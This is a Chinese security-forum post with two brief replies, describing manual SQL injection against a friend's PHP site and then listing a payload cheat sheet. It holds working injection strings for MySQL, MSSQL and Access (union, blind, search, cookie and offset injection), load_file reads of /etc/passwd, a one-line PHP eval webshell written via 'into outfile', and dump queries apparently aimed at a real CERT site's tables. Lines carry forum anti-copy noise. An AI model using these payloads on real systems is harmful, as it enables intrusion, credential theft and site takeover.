找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2700|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
! l) H  u0 o: Q: p4 T4 K9 Q让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
) K5 Y* D! \) B! N+ \3 p我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。. X1 }0 y% [8 O2 w
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)2 {9 q% y3 E: A& y2 i
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
/ c/ ~/ h& O8 W( z+ E这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:! @8 _: \$ L8 `& ~, G* x
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
! w) t+ Z9 b$ C0 R: }/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入- x7 w* L* W) b& @5 w* u' I+ d
                        
3 l5 z' R* f8 y7 N$ w2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,7 a" |6 C$ z+ |+ E2 W0 x3 D
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意/ W- B: I* G) L9 Z+ }
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
; w- |3 \) ^! ~' V& j3 P5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。3 `, A7 N, y9 ?! F  h8 Y
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,$ w# w( v# O9 e0 |/ P/ ~4 _$ C4 L
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。& r% ?' W( a1 |) u$ y+ ~2 {
我就用的是第二个思路,
6 o2 p/ J) X# J0 U/ ~: i" N提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  
1 u6 e  \# W' @( J8 f: T/ ]7 @6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,/ U! v, w5 ~: Y  E
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
$ H/ I/ B1 c4 y6 x注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。7 ?) V; _7 ^1 W# i2 N& n
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????1 H! Y2 Q" l! i
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
; |  V' }; {' j+ T, d; V5 ~提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
: B/ S. N3 s( }$ `然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
  f4 W5 ^& g( C, d; \$ |调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......
2 c( O  C$ e9 K) ]下面是一些很普遍注入方式资料:
* }8 q9 G! k" N+ X& O9 ]注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='2 u! E3 g% X( O2 ]) y, w5 ?+ L
拆半法
+ Z4 J; x5 J( G# w7 y######################################9 p! z# C" e# ^% D7 _9 g
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。$ k+ H* y& G4 u5 p
and exists (select * from admin)
& D% `7 ^3 V. Y- C' y  F  [6 k, Sand exists(select id from admin). M) g2 c' ~, u2 \. [5 W0 D
and exists(select id from admin where id=1)
7 Z" O2 G5 @" g2 Z, ^and exists(select id from admin where id>1) + a- w3 k9 ^: ~7 S
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
! a1 @% G" N4 Z5 G0 }and exists (select username from admin)
+ Q& V+ {) r" x" g# M* {and exists (select password from admin)1 P& c! H5 k' L# ]
and exists (select id from admin where len(username)<10 and id=1)7 b; x  p% W' u* e' R9 I* v* i
and exists (select id from admin where len(username)>5 and id=1)
3 Y( G- P" C2 ]9 j# Mand exists (select id from admin where len(username)=6 and id=1)
* I+ W& C. M: ~* A  E7 v% aand exists (select id from admin where len(password)<10 and id=1)' d, }" t4 f4 r) f5 O$ Y1 b* x
and exists (select id from admin where len(password)>5 and id=1)+ z, ?! h6 C/ b2 h' _- }9 Q5 Y3 R
and exists (select id from admin where len(password)=7 and id=1)1 V/ b6 i/ p. Z  G& M, Y, p' t" t
and (select top 1 asc(mid(username,1,1)) from admin)=97
. S/ k# ?. K) W( s2 P' p" x返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
2 a% {& V# ]3 ~8 H7 B& B猜第二位把username,1,1改成username,2,1就可以了。/ D! D7 ~, V! M1 m$ p
猜密码把username改成password就OK了
% M6 N/ _& ]# f5 D) J1 i9 R##################################################
0 J2 q1 A# S) w; n8 h( X" ^1 p" X搜索型注入& W' B6 b2 f7 }, P  f6 Z, _( c
##################################5 e! _6 I- ~9 v, r7 U1 b3 [
%' and 1=1 and '%'='( U. K# f) Y  m/ e
%' and exists (select * from admin) and '%'='
8 M# X$ r) W& c8 a4 X%' and exists(select id from admin where id=1) and '%'='# o5 g* I0 x7 ^: o+ e3 M- t8 O* B
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='5 }  I: D& N0 b! i7 z% w! p2 e
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='$ I/ Q% B2 ?5 _  l0 K* f8 t
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
# O5 R& H5 p0 b* P. P  k2 V1 o这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='6 t8 m+ v% }; [( J& I1 p: S. s" y
对于MSSQL数据库,后面可以吧 and '%'='换成--
6 N# h' F8 y* g) d+ J! v还有一点搜索型注入也可以使用union语句。
1 d& }9 k; A7 f3 S. J; g########################################################
& H1 J( s! F6 {0 B联合查询。; I9 H! x1 f% Y! `& r
#####################################9 o' {, s3 n: Y$ l; g
order by 10
, W8 e& t* Q  g# t6 Mand 1=2 union select 1,2,3,4,5,6,7,8,9,100 j  F. {) Z+ e# e6 Q  k7 P
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin, X3 W" F) A4 U4 _+ }
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1: R+ E* s" J# I# V* U$ L) M% {/ A0 H
很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
( V, ?( T- p$ V3 j& g) C) g. y###################################
  g9 h3 i+ k6 L1 ?cookie注入
- B: J" P3 k* w###############################
  c* C5 r1 u2 Z: bhttp://www.******.com/shownews.asp?id=127$ d0 W# x5 I. J+ `  f
http://www.******.com/shownews.asp* |# s7 {. `$ E  S8 D5 N0 ]
alert(="id="+escape("127"));/ Q; z- F( L( ?3 c& x7 y+ m
alert(="id="+escape("127 and 1=1"));
6 x( q+ t) @' o/ s6 `alert(="id="+escape("127 order by 10"));
' J  j: K  P, L# C1 T: f( H# ?, salert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));0 G) q* O! |3 H8 O+ h
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
& X9 O4 e( X% j3 s$ ^0 Y0 S这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。+ O- J( [7 i7 K5 c: ~
###################################
5 N- I3 ~+ ~) ]' g偏移注入
/ ?2 x) D7 r5 M5 u$ [5 X###########################################################4 w* r0 c6 A- f  n- a! z
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
, ]: t& s  g, t5 c3 b) c# Uunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin0 ~9 B; N) E# g& R, c$ ^
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)( X' v  N$ N" C  u' G4 h; G/ H4 y
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
; K: g% k/ Q9 aunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
! t7 w3 N2 j& [union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
. I, j+ p! X' u9 j  z4 sunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
: _# j3 r, x  a; za.id=d.id)
. N/ Y  f8 S! [  Mand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)8 P$ ]0 I7 f  T" V' @* i& v6 w
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) + T; C+ i+ j' V- W5 W4 H
  
/ C2 s1 [: n! Y8 D9 Q1 M  r9 |7 Q============================================================================================================7 R- {9 [9 Z  g, {2 X6 {) ^# N
1.判断版本
: }, [' \8 T4 e. E# t* o0 _9 Zand ord(mid(version(),1,1))>51
# c( o2 J/ \2 x$ q9 Y返回正常,说明大于4.0版本,支持ounion查询8 p9 V5 W% y9 D
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
, i; [& \4 s- j4 Tand 2=4 union select 1,2,3,4,5,6,7,8,9--
& d  b# y* L$ m3.查看数据库版本及当前用户,
6 ]) W( F% @* _7 q& x. mand 2=4 union select 1,user(),version(),4,5,6,7,8,9--
' c5 W0 Q& l/ H% r数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,$ d$ S- v6 z3 i* i* z
4.判断有没有写权限; ^# @) b5 A- V9 S3 g
and (select count(*) from MySQL.user)>0-- + N8 v5 @5 K7 n8 O
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
- y# a* {9 p  w用不了这个命令,就学习土耳其黑客手法,如下
8 F* x& W, k& H% ]' w  f5 ^# x  rand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
7 \% B. y+ m4 a$ T1 N/ y7 B/ [6.爆表,爆库
2 {8 w  K- K3 X& h2 V, oand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
, C9 E3 c7 q5 I2 K7.爆列名,爆表; `5 x! c+ r8 {& {# W
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
& B% e; B: i. n2 k" q* S/ w% y! Q0 o8.查询字段数,直接用limit N,1去查询,直接N到报错为止。/ W# p2 ~2 Z' N8 L
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--# f8 S% P' |- d
9.爆字段内容' k  z% V: {% c3 B: }! h: d! D
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--" M' P; r2 w3 p- C( Q. a  s4 k
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表